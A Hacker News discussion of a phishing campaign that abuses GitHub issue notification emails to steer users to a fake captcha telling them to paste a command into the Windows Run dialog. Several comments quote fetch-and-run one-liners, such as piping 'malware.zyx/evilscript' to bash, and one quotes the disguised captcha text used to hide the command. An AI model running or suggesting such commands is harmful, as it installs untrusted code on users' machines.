Hacker News new | past | comments | ask | show | jobs | submit login
GitHub notification emails used to send malware (ianspence.com)
467 points by crtasm 18 days ago | hide | past | favorite | 178 comments



Do people really fall for scam like that?

First, I assume the author knows the email came from github, as the screenshot does not show this very clearly. If that's the case:

Red flag #1: email links to a variation of real domain. If you don't have information on who github-scanner.com is, it is pretty safe to assume it's a scam , just because it sounds like a real website.

GIANT Enormous Huge Red Flag #2: captcha asks you to types command in shell. I have no comment on how naive one must be to do this.


It’s a numbers game.

Nobody is perfect. The more features of credibility, most likely there will be a higher percentage of conversions. But not everybody has excellent vision, is not time-pressured, and is not tired/exhausted.

There are lots of conditions that make otherwise difficult fraud targets more easy to trick.

And if it can be done at large scale / automated, then small conversion rates turn into many successful frauds (compromised accounts).


I think they’re hoping for coincidences and the higher the numbers the more likely they’ll find one.

I got a real letter from the IRS two days before I got the scam message on my answering machine. The timing was uncanny and I might easily have fallen for it, had I not already dealt with it.

It’s the same for the Chinese language calls, if you speak Chinese it really resonates.

There was a scam in the 90s where you’d call a number and they’d give you sports betting advice. They’d do it for free as a promotion trying to sell their service when you won. They’d tell half the callers bet team A and the other half team B. The numbers made it work.

“Splitting games 50-50 like that—known in the biz as "double-siding"—is the oldest trick in the handicapper's very thick book. That way he knows he has at least some happy customers coming back. “

https://vault.si.com/vault/1991/11/18/1-900-ripoffs-the-ads-...


Agree, I once fell for a scam that I think I otherwise wouldn't because of string of circumstances: Being tired and stressed, it being Christmas time and I had actually ordered stuff but also because I had just upgraded iOS to the first version that put the address bar in Safari on the bottom of the screen instead of the top so I forgot to check the domain!

I've since changed the address bar back to the top…

In the end I didn't loose anything but it was a good wakeup call for sure.


Thanks for this summary. People often forget they (hopefully) have grandmas and themselves sometimes making mistakes as well for -- whoever knows what reason. Sometimes.


If this was within my first year of owning a GitHub account, I would absolutely fall for this.

It's not much different from setting up your ssh key - something that you have to do; and new users also go through this workflow by copy pasting commands that GitHub sends them.


A prime example how all the paranoid security hoops can easily make things more insecure in aggegate.

Since Microsoft embracing and extending it, GitHub has become one of the worst offenders.


A few weeks ago someone opened an issue in one of my repos. In under a minute two accounts replied with links to file lockers asking the user to download and try some software to solve their issue. No doubt it was malware. I promptly deleted the comments and reported the accounts to GitHub.

I wouldn’t have fallen for such an obvious ploy, but the original asker seemed like they weren’t particularly technical, judging by the sparse GitHub history and quality of the question. I could see them perhaps falling for that if they were uncritical and too eager to try anything.


Email from a different domain is unfortunately quite common. Citi and PayPal both do it for some emails. Pisses me off every time.


I just don't get it, how hard it could be? How expensive this could be? Because lots of times they just pay these damages to the customer, because no one knows how this very secure credit card data was compromised. This baffles me. Someone, please enlighten us, there must be a valid reason - at least from an angle.


Having a bunch of different domains can serve multiple purposes.

In GitHub's case, they already have githubusercontent.com to avoid serving untrusted stuff from their own github.com domain.

Sending marketing or security scanner (potentially very spammy) notification emails from separate domains can help with reputation too, to avoid your main domain getting marked as spam.

These are all legit; Amex having 20 different of domains, half of which smell like phishing, and still sending emails from other domains is just incompetence. Something like marketing people or someone dealing with strategy deciding to do stuff in a certain way, with nobody technical in the room to tell them why that would be a problem. As an example, a friend of mine's organisation wanted to do a SaaS website for their niche, and a separate website to advertise the SaaS (separate domain, visual identity, everything).


My theory for most of these cases: they would need permission from who knows what department(s) to set up a subdomain of the main domain for their project, and it's easier to just purchase a new domain for the team/project.


Nailed it. This is 100% pragmatism/convenience-based decision making rooted in terrible culture, red tape, bad communication and dumb org charts.


Keep your SPF simple. Otherwise, make sure it works. Aaand, how many people actively monitor their DNS infrastructure?


I'm old enough to remember ILOVEYOU. During years after that I have seen millions and millions thrown into educating users not to click on wrong things.

Last month I was in conference where the keynote was from CEO of cyber security company. The whole point of the speech was that we need more money because in some cases more than 80% users still fall into email scams. My very serious question to the speaker was - if after many millions and almost 25 years more than 80% users still click on wrong links, then maybe we do something really wrong?


We are, but people want convenience.

Try to get a company built around Word to use another tech that doesn't requires running unsigned macros from emails...

You literally can't, they lough at you for saying things like "don't use Microsoft"


They measure by clicks… but clicking a link doesn't mean you'll follow through and put in your username, password, and 2fa code.

Ultimately he's a businessman seeking for more money. Doesn't mean he can be trusted.


In my opinion, these products are nothing but scams. I can’t use any links from work emails on my phone because I can’t see the domain of a link without previewing the page. IT told me I needed to change system-wide settings to disable previewing webpages in every app on my phone. Not happening.

Fortunately, my work email supports IMAP, so I can use a script to scan my inbox for fake phishing emails and delete them.


We are not not doing anything wrong, but we are completely neglecting the attacker side.

All our actions are defensive.

Look at our physical security. Basically nothing is reasonably protected. 99% of stuff (buildings, locks) can be broken into with tools available in any home depot.

The key reason why it doesn't happen that much is because it's possible to find the attacker.

Why can any scammed just create a website without any traceability? It wouldn't be foolproof, but it would raise a bar.


> Why can any scammed just create a website without any traceability?

because jurisdictional challenges.

Not to mention that this very same traceability would be abused by some other authoritarian gov't to track down dissidents for example.

There's no real way to systematically have good security, if the human element is the weakest link tbh. Securing windows is not a technical problem, but a social and educational one.


More like no will.

Does the domain/server implements required level? No? Block connection. Dtto email with automatic response.

Is your IP in a botnet? Cut it off.

Edit: I already get blocked connection (on target site) because EU regulation is too onerous. I get reminded on basically every Google search I am being censored (Some results may have been removed under data protection law in Europe).

Completely doable.


> I already get blocked connection (on target site) because EU regulation is too onerous

More like "we want to track every single user coming to our website without giving them the option to not be tracked".


You can serve consent form only to the connections from EU.

I have been part of se several GDPR compliance projects and it's the other stuff that's the problem.

Data protection officer (recurring cost, even though it is only a part of a job, not full time position) , user data deletion and user data take-out. Compliance is not free. If system wasn't designed from the beginning, it's really expensive to add it.

Restore from backup after disaster recovery - make sure you anonymize/delete people who were deleted after backup was made.

BTW, IP address is PII, so...

Honestly, it would be cheaper to buy everyone in EU VPN.


It's actually very simple & cheap to be compliant: stop tracking EU citizens.


> You can serve consent form only to the connections from EU.

Why? While I get that, if tracking is part of someone's business model, they want to track as many people as possible, I doubt it would be illegal to give also people that aren't in the EU the option to not be tracked. If it really would be so expensive to be compliant while also differentiating between users connecting from the EU and users connecting from outside the EU, why not just give everyone the option to choose if they want tracking as a measure to cut compliance cost?


What do you suggest? Bomb even more countries?


You don't need to bomb anyone.

Add IP rules at cables inside and out of let's say EU and block it there.

Same way we deal with any non-compliance thing. You can't import it.

Your server/domain doesn't satisfy requirments. Either the originator complies or not (e.g. through trusted third party).


Because ip geolocation has always been reliable and never inaccurate?


No geolocation is needed. And even if it was, these are technical problems, inherently solve able.

So far, we are building walls and replacing mortar with a new one, while attackers bombard us with complete impunity. This is never going to work.

This would of course need new extensions /protocols (even simplest would require authentication envelope around encrypted traffic).


The problem is that you think a societal problem can be solved technically.


The whole point is to move from technical solution (i.e. current approach) to legal one.

Not a single response had anything to do with either problem ITA or my comment.

I am not sure if you are troll, 10 y/o or gpt1, but have a nice day.


Quite humble of you to presume anyone who disagrees with your "brilliant" idea has something wrong with their brain.


Do you think people should have to get permission to host a server on the internet?


> GIANT Enormous Huge Red Flag #2: captcha asks you to types command in shell. I have no comment on how naive one must be to do this.

I guess critical thinking of devs and wannabee devs has been softened by all the `curl <script> | bash` installation instructions.


Yeah exactly, I do that all the time when filling captcha!


They do. Just after seeing instructions to run this, and complying:

> curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh

(Yup, .rs is the ccTLD for the Republic of Serbia, of former SFR Yugoslavia)


> captcha asks you to types command in shell. I have no comment on how naive one must be to do this.

someone who knows computers (like a programmer) might not fall for it, but people who do not know computers, but is dabbling could easily fall for it.

The copied command specifically puts in a "user friendly captcha message" into the end, to overflow the run dialog textbox, so that a user who obeyed the instructions will see something vaguely resembling valid captcha verification:

   # " ''I am not a robot - reCAPTCHA Verification ID: 93752"

Phishing and scams are not about catching out pros, but catching out "normies".

It's quite scary that the scammers have put thought and effort into the method of infiltration, because this is "novel" as far as i have heard.


I can understand clicking on the link while not paying attention, but I do wonder how many people who are signed up on GitHub would follow through with pasting this command. I could understand if elderly non technical people might follow up with it, but this one, I wonder what the rate is.


Just clicking on the link might be enough. Maybe you have a slightly outdated browser with a known vulnerability. Maybe you’re holding off on installing an update just to be sure it won’t break anything.

And even if everything is up to date Pwn2Own regularly shows that having a user browse to a website is enough to get root access. Thankfully most people don’t have to worry about this since they are unlikely to attract the attention of someone with that level of resources.


If I had those kinds of resources I might even put a captcha on the site that asks the user to do something incredibly stupid just to make them think they were in the clear.


Yeah, I think the barrier to get people to just click on a link (outside of e-mail as well) is very low, so that would be easy to affect anyone.


All valid points, but I will say services don't help in this situation - I received an email from @redditmail.com recently, which is real and part of reddit but feels off on first glance.

Couple that with gmail having no way to show the full email address (by default - I know you can hover, etc.), rather than the sender-provided "sender name", and my false-positive rate for at least double checking and confirming the sending domain is kinda high...better that than a bunch of false-negatives of course.


> Red flag #1: email links to a variation of real domain

It's too common, MS also does this, to be a red flag


>GIANT Enormous Huge Red Flag #2: captcha asks you to types command in shell. I have no comment on how naive one must be to do this.

Funnily enough there's at least one legit captcha that has you do this: if you have JavaScript/WASM disabled it gives you the option of running the anti-DDOS proof-of-work in a shell and pasting the result in a textbox.


> Do people really fall for scam like that?

You should put a "voice activated" sticker on a random break room appliance (toaster, water/ice dispenser, microwave, coffee machine, ...).

Don't use strong adhesive if your desk is within hearing distance.


You assume the scammers want everyone to fall for this trick.

The reality is different - they leave these huge red flags so that people who aren’t very bright or careful will fall for it.

That is the same reason why scammers put spelling mistakes in emails - not because they don’t know how to use spellcheck, but because they want to filter out those who would spot these mistakes.

They want to scam careless, gullible, „stupid“ people, not someone who is careful enough to spot security red flags.


  > Do people really fall for scam like that?
I routinely get people opening issues on my projects asking where the source code is or how to fine tune their models on different data or even how to install pytorch.... There's a lot of people on GitHub that don't know the first thing about coding. There's a lot of people on GitHub that don't know how to use Google... This even includes people with PhDs...


I've also seen an issue on GitHub asking project author to add an entry in README.md with instructions on how to clone the repository...


Actually worth doing if the repo uses submodules.



The naive way in this case wouldn’t be to make an issue: How do I clone this repo? I see it has submodules

The naive way would be to just clone the repo without any (apparently) options.

I can attest to this because that’s probably what I would do.

The readme would not resolve a problem that someone knowingly had. It would resolve an unknown upcoming problem.


Yeah, git clone --recursive is the main thing I suggest. But unlike Google I include the exact command that you can copy and paste into the terminal to clone the specific repo in question.

And if you're reading the README after cloning it already, there are instructions for sorting that out too, also suitable for copy and paste.

Or if you downloadeded the ZIP from GitHub - I'm sorry. But you won't be left too confused, at least you won't if you read my README, because my README covers this situation as well.

(Also: don't forget to git submodule update after changing branch! But if you're noting everything my README tells you, you won't.)


Not only does it ask you to copy and paste a command in shell, but Windows apparently warns you that it will run with admin privileges.

Aside from that:

> Nowhere in the email does it say that this is a new issue that has been created, which gives the attacker all the power to establish whatever context they want for this message.

What about the non-user-controlled "(Issue #1)" in the subject line?


Red flag #3: "Github Security Team"

A legitimate GitHub email would never mis-capitalize the company name like that. It would be GitHub, as shown in the footer that the attacker does not control.

OTOH, this is a very common mistake. The article alternates between the correct GitHub and the incorrect Github. So it would be easy to not notice that error.


> Do people really fall for scam like that?

Yes. It wouldn't be a thing otherwise. I know at least two fairly intelligent people, one literally being a Mensa member, who fell for sextortion emails and got their files encrypted.

Scareware is based on social engineering, and is crafted to trigger emotional response, not educated one.


Just to let you know, even github themselves use multiple domains instead of just subdomains of github.com (see githubnext.com).

So, I wouldn't blame the victims here if the service itself does not realize why that is not such a good idea.


Yeah.. I don't like when companies do that. I usually Google the domain first to see if it's legit, but even that isn't foolproof.


re #1: the email could link to a github pages site hosting the same malware...

re #2: it doesn't really have you typing into shell, 'just paste'


Honestly i would have typed commands in shell if "captcha" asked me for it. Just to see the scale of outcome's awfulness.

I'm almost bored enough to just start installing weird malware for research and funsies


Everyone has been trained for years to do this:

curl http://obscure.url?random-string | sh


If there were a legitimate looking GitHub how-to page that asked me to do that, I can see myself doing it. Fortunately, I ignore all security issues on my repositories.


Security by lack thereof


No they haven’t, they’ve been trained to do

    curl https://url-of-well-known-project | sh 
I may not trust the owners of a random domain, but I certainly trust the owners of rustup.rs not to do anything intentionally malicious.


Then you are more trusting of the Serbian National Internet Domain Registry than you should be.


Microsoft owns more domain names than the amount of neurons in the brain.


people make a lot of noise about piping into shell, but even if the instructions were

wget random.club/rc-12-release.sh

chmod +x ./rc-12-release.sh

./rc-12-release.sh

almost nobody would actually read the script before running it


Well yeah, if your intention is to install software from random.club on your system, what would be the point of checking the installer script? The worst thing it can do is the same thing you want it to do.


Yes, which is why complaining about curl | sh is silly.


I’m not disagreeing.


or even this:

git clone http://github.com/unknown/repo.git && cd repo && npm install


Even worse:

$ svn checkout

$ ./configure

$ make

# make install


Another red flag. I cannot take any project serious that has this on its documentation.


You prefer that they wrap it in an .msi file and put it on that same website? What do you think the advantages of that are?


I guess you don’t think the Rust programming language is a serious project, then?


I mean they even named the website cargo, after cargo culting! (jk)


what is the more secure way in you opinion? What is the weak link here? TLS transport? possibly compromised hosting/codebase? trust in app authors? not reading the shell script? checking a signature of some file?


My issue is the bypassing of the systems package manager. Doing so will result on files spread somewhere over the system. How do you uninstall such thing properly? How do you update (or even know) it's dependencies? Will it break because I uninstall or update one of it's dependencies?

Linux has a very good package management for many years. I see absolute no reason to break this by creating shell installers.


I got a much more convincing email from PayPal recently, someone sent a quote (apparently a feature that can be used unsolicited), and set their company name to something like "PayPal need to get in touch about a your recent payment of $499.00, please call +1-....", so this is most of the text at the top because their quotes email is "<name> is sending you a quote for $xxx".

This email came from the real PayPal.com, how they haven't gotten on top of usernames like that is beyond me for a payment processor. I reported it to them but haven't heard anything back, hopefully they banned that account but they should ban all names like that.

This email honestly was formatted to look like a legit PayPal email, I have to imagine that scam will trick a lot of normal people.

Get in touch, see my bio website, if you want the email.


Had this happen to me over a year ago so I assume reporting it to them did nothing :)


I got a very similar thing: a legit email from PayPal, but it's an invoice and not a quote. And when you login to PayPal the website shows nothing.


Why would paypal email you to call them ? If they want something from you they should either call you or email it to you or show it in their portal.


I don't know, most PayPal customers wouldn't know either. And the point is that these emails are designed to look legit and also scare you into taking action without thinking about it too hard. And this particular email bypasses a lot of the rules in general consciousness about phishing like "check for spelling mistakes, check the sender email, does it look official, does it mention you by name", all of those boxes are ticked. This is only possible because PayPal clearly aren't actively fighting against these kinds of attacks.


I'd be surprised if someone looked at it.


>This email honestly was formatted to look like a legit PayPal email,

this is why anything but plain text should be blocked in emails (besides security reasons). anybody with 5 minutes of HTML experience can create "legit looking" emails.


It was an actual email sent by PayPal via a service they propose (sending invoices), just with a smartly crafted company name that made it look it's from them. No HTML was required from the attacker.


Legit looking because it was formatted by PayPal themselves, and also sent from PayPal.com.


      Press Win+R, CTRL+V <enter>
From captcha to gotcha.

I could see junior developers falling for this. Hey it's Github, it's legit right? We get security notifications every second months about some lib everyone uses etc.

      "Oh look, captcha by running code, how neat!"
I don't think webpages should be able to fill your copy/paste buffer from a click without a content preview. They made it requiring a user action, such as clicking, thinking that would solve the problem but it's still too weak. That's problem number 1.

People need to stop actioning any links from emails and/or believing that any content in an email has legitimacy. It doesn't. That's problem number 2.

Problem number 3, Windows still let you root a machine by 1 line in powershell? What the @$$%&%&#$?

Github might need to stop people putting links in issues without being checked by automated services that can validate the content as remotely legitimate. They're sending this stuff to people's email, don't tell me they're not aware this could be used for fishing! That's cyber security 101, in 2015.

Finally, Github, in being unable to act on the above, may need to better strip what they email to people, and essentially behave more like banks "you have a new issue in this repository..." and that's that. You then go there, there is no message, ok great. That would have taken care of this issue...

It seems Github needs to graduate a bit here.


"I could see junior developers falling for this" - I can see all sorts fucking up, not just juniors. It is the way of things.

"I don't think that...". I think that you have to train your troops effectively in what is harmfull.

"Windows" - yes. I have been asked by at least two of my employees to get them away from Windows. I'll do my best. Its been a long running project but I will succeed.


> Problem number 3, Windows still let you root a machine by 1 line in powershell? What the @$$%&%&#$?

sigh It needs to be run under an account with admin privileges for that. The shield on the "Run" dialog screenshot clearly indicates what it was taken under a user with admin privileges and UAC disabled.

Come on, now cry what Linux still let you root a machine by 1 line in curl malware.zyx/evilscript | bash.


> … by 1 like in curl malware.zyx/evilscript | bash.

Making the script POSIX compliant would allow hacking computers without bash. Then you can pipe it into just “sh” which is guaranteed to be on the PATH.


> it was taken under a user with admin privileges and UAC disabled.

you will have to accept that users either ask this UAC to be turned off, or it gets turned off by the original installer of the windows for the user (presumably non-technical user).

It's like telling traffic accident sufferers that they should've put on a seatbelt. True, but pointless.


> you will have to accept that users either ask this UAC to be turned off

Running with UAC disabled under an admin account?

That's not only a lack of a seatbelt, but wearing a flip-flops too.

And I'm eating my dogfood too, I'm running under a regular user since migrated from Vista, both on personal and work devices. Sometimes it's PITA, sure, but it's manageable.


>Come on, now cry what Linux still let you root a machine by 1 line in curl malware.zyx/evilscript | bash.

Excuse me, but some of us prefer to let evil scripts root our machines via pure sh, thank you very much.


Glad I’m not the only one thinking about POSIX compliance!


I've started disabling the Run dialog for non-technical users, but unfortunately a GitHub attack targets users who likely have a real use for it sometimes.

The clipboard strategy feels like it should be easy to block too, most scammers just convince people to type a well-obscured URL into the Run dialog manually over the phone.


> The clipboard strategy feels like it should be easy to block too

yea, the browser should actually have each site ask for permission to modify the clipboard imho.


That might add another step but I think it is unlikely to help reduce the number of victims. If someone is willing to bring up the run prompt and paste whatever they have in the clipboard they are also likely to be social engineered into clicking yes on a dialog that tells them to allow clipboard modification.


This captcha is so bad... I'm gonna automate the solving of this captcha so whenever my browser shows me "Press Win+R, CTRL+V <enter>", it automatically runs cmd.exe with the clipboard content so I can get to the site content faster and with no interruption.

Yes, I'm a 10X Windows user.


>Windows still let you root a machine by 1 line in powershell? What the @$$%&%&#$?

You say it's a problem, I say it is a virtue.

We can "root" Windows because we are root, specifically a user in the Administrators group because the first user account configured by Windows Setup is always an administrator account.

This is a virtue. We can do whatever we want with the computer we own and use. This is freedom par excellence that literally every other operating system family today wishes they could do without getting shouted down.

In an era of increasingly locked down operating systems that prevent us from truly owning our computers, administering them, Windows just lets us do that. I hope to god this never changes.


>>Windows still let you root a machine by 1 line in powershell? What the @$$%&%&#$?

> We can do whatever we want with the computer we own and use.

There is a difference between what an owner of a computer can and should be able to do, verses what an arbitrary actor can do to a computer they do not own through subterfuge. It is the responsibility of an Operating System to facilitate the former and guard against the latter.

MS Windows has a poor history of being able to do either.


Remember the old saying: With great power comes great responsibility.

Windows just lets us do anything and everything, and it's up to us how we want to secure it if at all.

Every other operating system family tries to realize security by straight up locking the user, the administrator, out of his own computer. They still get compromised, by the way.

Windows has absolutely succeeded and continues to succeed in enabling the user, including security if he so desires. This is the reason Windows became the dominant desktop OS. The others? Nope on both counts. The Linux world in particular always screams about user freedom, yet ironically it's Windows and its community that actually makes that freedom a reality.

Once more: I hope to god this never changes.


This is a wild take. Would you mind expanding a bit on the oppressive, locked down ecosystem that’s choking the free expression of Linux users?


For starters it's security theater, given everyone and their dog prefixes sudo to all commands without much thinking. There are also some who just smash in sudo -i as the first thing they ever do upon boot (guilty as charged) because they suffer RSI from typing sudo a trillion times.

There's also this impression that the operating system is just secure and you as the user are just protected like it's a law of physics. Spoiler alert, you are not and it's not a law of physics either. It's still your responsibility to secure the computer if you so desire and otherwise not do dumb shit like copypasta'ing commands from the internet.

I'm not even going to get into the politics that are package managers and repos, that's just straight bullshit that has more to do with human nature than computer science.

Speaking of politics, most of the FOSS community at large hates users using and administrators administering computers how they want. You must subscribe to the One Libre Way(tm) or you are a heathen doing it wrong. So much for freedom. The Windows community meanwhile is mostly composed of jaded engineers who are just happy to see others get stuff done and get through another day in one piece.

Windows from the start places the user at the controls with mostly no child safety locks in place (and you can remove what is there easily, eg: UAC), and with that power you have to accept that if you end up hosing the system the problem is you because Windows doesn't even pretend to really protect you.

Having the sheer power to hose Windows with a single Powershell line is what freedom is. Freedom is both delightful and horrifying.


> Windows from the start places the user at the controls

Would this be the same Windows that now requires TPM2, UEFI Secure Boot, a Microsoft account to log in, and a special boot mode to use drivers not signed by Microsoft?


What I am writing below I mean genuinely, without malice, and in the hope it helps dispel some of the conclusions you have expressed above, if not for Linux itself (which I do not normally use) then for other Unix operating systems such as FreeBSD[0].

> For starters it's security theater, given everyone and their dog prefixes sudo to all commands without much thinking.

Setting aside the hyperbole, such as "everyone and their dog prefixes sudo to all commands" and "most of the FOSS community at large hates users", user/group/other permissions are one part of security in depth. Excessive use of sudo is indicative of an improperly configured system or use of software which lacks understanding of the OS which runs it. Both are causes for concern.

> Windows from the start places the user at the controls with mostly no child safety locks in place ...

To continue your analogy, child safety locks exist to minimize avoidable catastrophic situations for those unable to do same.

> ... with that power you have to accept that if you end up hosing the system the problem is you because Windows doesn't even pretend to really protect you.

At first glance, this has a "victim blaming" flavour to it along the lines of "you should have known better." A more concerning implication is that this perspective does not take into consideration what happens when a blackhat attack is perpetrated.

What benefit is "the sheer power to hose Windows with a single Powershell line" when it is not you whom executes it?

0 - https://docs.freebsd.org/en/books/handbook/introduction/


You will have to excuse me for effectively ignoring the rest of your comment since what I'm about to point out more than makes up for the things you pointed out.

>What benefit is "the sheer power to hose Windows with a single Powershell line" when it is not you whom executes it?

The benefit is the sheer power to hose Windows with a single Powershell line.

In case that doesn't make sense, let me put it this way: The benefit is the power to do whatever you want with Windows.

Windows essentially will not say no to what you ask of it, you have the freedom to do with your computer as you desire with Windows. With this power, this freedom, this virtue comes responsibility. You as the user must secure the system as desired from the ground up, you have the power to do so and the responsibility.

Computers are tools, Windows enabling your ability to use your computer as a tool is a virtue that is priceless especially in this day and age.

If you don't believe me, consider that Windows brought forth the era of personal computing to the commons and continues to enable them by nurturing an ecosystem that can cater to almost all users' desires that now spans literally decades.


> >What benefit is "the sheer power to hose Windows with a single Powershell line" when it is not you whom executes it?

> The benefit is the sheer power to hose Windows with a single Powershell line.

> In case that doesn't make sense, let me put it this way: The benefit is the power to do whatever you want with Windows.

The point which I think I am failing to convey is not about limiting what a person whom owns a computer can do with it. Instead, it is that computers interacting with other computers can be introduced to code which is not "whatever you want with Windows", but instead "whatever someone else wants to do with your Windows."

In the case you presented above, nowhere is there consideration of malicious actors. Were this not a real concern, there would be no market for virus scanners (be they for Windows or other operating systems).

Here is an exercise to try out - replace first person tense in the text above with the equivalent of "someone other than me."


I truly don't understand your desire to remove Linux file permissions. I also don't get why you think it's difficult to do so. There are plenty of ways for you to enable yourself to hose your machine without having to enter a password.


> This is a virtue. We can do whatever we want with the computer we own and use.

You certainly don't need to do it with a single line of powershell though. At least, not without intentionally opting into it. For the most part on a daily basis I just want to use my computer, not modify it.

Anyway, at the very least most functionality should be sandboxed so that if someone does something without your consent, it can't do much damage. Though this wasn't the original intention, leveraging user privileges and sandboxing applications by user is an effective way to do this.

Besides what kind of moron would choose proprietary software if they wanted control of their machine? It's inherently a contradictory impulse.


> At least, not without intentionally opting into it.

just to clarify in Windows, users with administrative privileges will in theory still ask the user to opt-in every time before any process is elevated to administrative rights. Its just that Windows security is so awful that people have found many different creative ways around it over the years, but those are (sometimes) getting patched by Microsoft so they are considered "bugs".

For example a process stores its executable path in memory writable by itself, so you could start a process that replaces its executable string to "C:\Windows\explorer.exe" and it would (for whatever reason) bypass the "ask for administrative rights" dialog popup. This is the sort of "security" that Windows is built around to its very core.

https://github.com/hfiref0x/UACME

> "This tool shows ONLY popular UAC bypass method used by malware, and re-implement some of them in a different way improving original concepts. *There are different, not yet known to the general public, methods. Be aware of this;*"

(also i think you are responding to a troll btw)


>(also i think you are responding to a troll btw)

You would be wrong.


thats exactly what a troll would say though :p


Can be summarized with: Don't click on links in email.

So is github-scanner.com (and github-scanner.shop) still the same malicious party? It seems to be. Funny that their DNS is hosted by Cloudflare (who, famously, don't host anything, because they think we're all dumb). Cloudflare, who take responsibility for nothing, has no way to report this kind of abuse to them.

The domain which hosts the malware, 2x.si, both uses Cloudflare for DNS and is hosted by Cloudflare. At least it's possible to report this to Cloudflare, even though they rate limit humans and have CAPTCHAs on their abuse reporting forms.

Sigh. Thanks to Cloudflare, it's trivial these days to host phishing and malware.


Cloudflare is way more responsive to abuse requests than 95% of country level DNS registrars. Having experience working with both.


95% more responsive than 0 is still 0.


I don't know how effective and quick to respond but there is a way to report malware [1]

Extracting from the page

> Which category of abuse to select > Phishing & Malware

https://www.cloudflare.com/trust-hub/reporting-abuse/


Cloudflare's abuse form will not let you submit the report if you don't include a URL that currently points to their network. There're no options for phishing / scam domains for which they're the registrar and/or DNS hosting.


I haven't tested the form, but they do claim you can report abuse of the registrar with some of the options, perhaps they've changed it?

Failing that:

> If Cloudflare is listed as the registrar on an ICANN WHOIS listing, you also can email reports related to our registrar services to registrar-abuse@cloudflare.com


> Don't click on links in email.

Not saying you're wrong per se, but isn't it more so summarized with "don't fall for a 'CAPTCHA' that requires you to paste code into the window labeled 'This will run with administrative privileges'?"

This is more so a grumble than a serious comment on security, but agh, it's always bugged me that the metric for failing phishing tests is "clicked on any link in the email" and not, you know, entered credentials into the phish site, or downloaded and opened a file. Like, I get it, it's much easier to teach nontechnical users to simply not click bad links than that other stuff - and browser vulns do exist - but it still vaguely annoys me.

I feel like I've seen countless posts like this one that end in the user entering creds, giving the browser some weird permission, downloading some file (sometimes straight-up an executable), or in this case, running a command. I don't know if I've seen a single one that ends in "and then they clicked the link and it popped a browser 0-day and that was the end of that".

Web browsers are a wide attack surface, yes, but they're also... intended for browsing the Internet. Most people click through links pretty haphazardly as they're doing work or researching a topic. Defense in depth and all, but I feel like a security policy that holds "don't visit any evil websites ever" as a core tenet is pretty flawed.


So how do you not click links to confirm your email for a new account?

Rather one could use Qubes OS and only open links in disposable VMs and never enter info beyond that

Thats basically what I do when I get emails to confirm my email address for a new account

One can't always avoid clicking links can they?


> So how do you not click links to confirm your email for a new account?

Fair question, but the "don't click links in email" is for emails that you don't expect. And sure, that's an unsatisfying answer because it's hard to communicate this wisdom to your grandmother.

I think the best answer is defense-in-depth. Ensure you use updated email clients, browsers, and OS, and employ a dns blocker like a pihole or equivalent public service.

For less-savvy people a device like an iPad or Chromebook can be a reasonable defense.


If I'm being honest, "don't click links in email unless you were expecting that particular email message" seems easier for grandma than "update x, y, and z, and use Pihole" unless you want to administer her network and devices. But maybe you're saying that an iPad/Chromebook can mitigate all of the above needs? A little bit.

Anyway, while I haven't heard of any cases yet, it wouldn't surprise me if senders of phishing email someday manage to deliver messages shortly after detecting some traffic (DNS lookup?) that you legitimately make with the entity the email is spoofing. Then you're expecting it, roughly.


It is a bit easier, at least. My almost 90 year old Mom now knows to be suspicious of email and to not believe email unless she has a reason to think she should be getting it.

To be fair about setting up a Pihole or some other form of DNS filtering, that's something that the network administrator should do, not individual users. It's a shame that it's still not trivial - companies that make NAT routers resist building in things that they don't completely control, so a configuration page for Pihole in your NAT router's web interface likely isn't coming soon. I hope that changes.

Mom also understands that someone taking over her Nextdoor account would be a nuisance, whereas someone taking over her banking account would be significantly more problematic, so the more important something is, the more time she'll take to ascertain its authenticity.

I practice explaining these things because I do it often. One interesting observation is that Mom believes me, so she does the things I suggest, whereas younger people think they know better, so they generally don't put much energy in to my suggestions. I'm working on ways of showing people that they're not necessarily safe because they're "doing the same things they've always done, and nothing bad has happened yet".


> a configuration page for Pihole in your NAT router's web interface likely isn't coming soon. I hope that changes.

In the meantime, the majority of routers do allow you to specify the DNS resolver instead of using whatever it learns via WAN DHCP, so you could put in a filtered public resolver (as opposed to your own Pihole instance) which gives pretty similar results if you don't need to whitelist anything. Plus, you can do the same on mobile devices that roam beyond that router (and avoid VPN through said router). I've been using dns.adguard-dns.com (94.140.14.14 and 94.140.15.15) [0]. They were founded in Moscow but now operate out of Cyprus (EU) and I don't have much of a reason to trust any other DNS operator more than them.

[0] https://adguard-dns.io/en/public-dns.html -- "method 2"


> The attacker quickly deletes the issue

I realized I have never deleted an issue I started but doesn't people with admin access the only with ability to delete the issues on a repo? [1]. So actually there is a trace for that issue in the repository. Same thing for Pull requests.

[1] https://docs.github.com/en/issues/tracking-your-work-with-is...


Maybe GitHub had already deleted it as malicious, but the email was already delivered.


I got this on two org repo’s yesterday. About an hour after the email, I checked and it was gone. I wanted to report it, even though GitHub scam reports are so very unsatisfying (weeks go by, then random email about how they took some action).

One very simple measure I hope they implement is just not sending emails for unverified spam like this. I’d argue a majority of issues or comments do not need instant emails. Even one hour delay could help in combating abuse like this if they had any sort of reasonable moderation rules.


> GitHub scam reports are so very unsatisfying (weeks go by, then random email about how they took some action).

Either you’re unlucky or I’m lucky, I’ve reported scammers to GitHub multiple times and always got a response in a couple of hours.


Same here, I get frequent spam on one specific (very popular) issue, and they always take care of it within an hour or two. I hide the spam myself to protect the users on the web (I can't do anything about the phishing emails though that gets sent [by default I think ?]), and their moderation wipe the spam account and sends a quick email to confirm.

Usually it's a new user who clones a few repositories to pass whatever mitigation they have.

Always get a "lots of reports, this may take a while" email first though. I don't think I ever not got that one.

I think there's something to be said about sending - by default - user generated content by email automatically if you've replied once to a thread. Lots of bad defaults here imho.


I reported spam comment and they acted in less than an hour. I reported the exact spam comment by another user in the same day and they took 3 months to act. It is a very random process.


Repo owners can also edit the title and text of your Issue as well.


Their claim that nothing tells you the email corresponds to the new issue is wrong, the "(Issue #1)" in the title means exactly that. I have actually received the same email myself and immediately recognized it as a new issue created on the repo. This user is obviously not used to GitHub issues as is made clear by the fact that this is the first issue on this repo. I guess GitHub needs to do a better job teaching new users.


True, but I have worked at companies who employ users that maybe aren't entirely up to speed on the technical details and they have GitHub account's for submitting bug reports. This would very easily fool some of these people.

Technical people might spot this, but that also isn't a free pass for GitHub to not do better here.


I received one of these notifications this morning and promptly ignored it. I had to laugh because it was about this repo specifically: https://github.com/kyledrake/theftcoinjs


It's worth the read, he shows what they're trying to do.

Easy to be suspicious with the link alone, but its fun to see someone digging into it.


Just this morning I logged a bug on a GitHub repo and within a minute someone responded with something to the effect of:

